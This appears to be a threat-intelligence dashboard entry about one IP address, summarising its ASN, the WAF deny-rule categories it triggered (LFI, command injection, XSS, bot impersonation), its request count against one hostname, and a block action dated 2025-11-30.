Investigation Workspace

Entity: 134.122.136.96 (Ip)

Entity Details
Type: Ip
ASN: AS152194 - CTG Server Limited
Threat Intelligence
Multiple critical WAF deny rules triggered, including LFI, command injection, XSS, and bot impersonation, indicating severe malicious probing and exploit attempts. All accessed paths were flagged.
Linked Entities
TLS Fingerprints (1)
Hostnames Targeted
Hostname            Request Count
www.darcherif.fr    179
Paths Targeted (with Hostname Counts)

Block

2025-11-30 14:03:57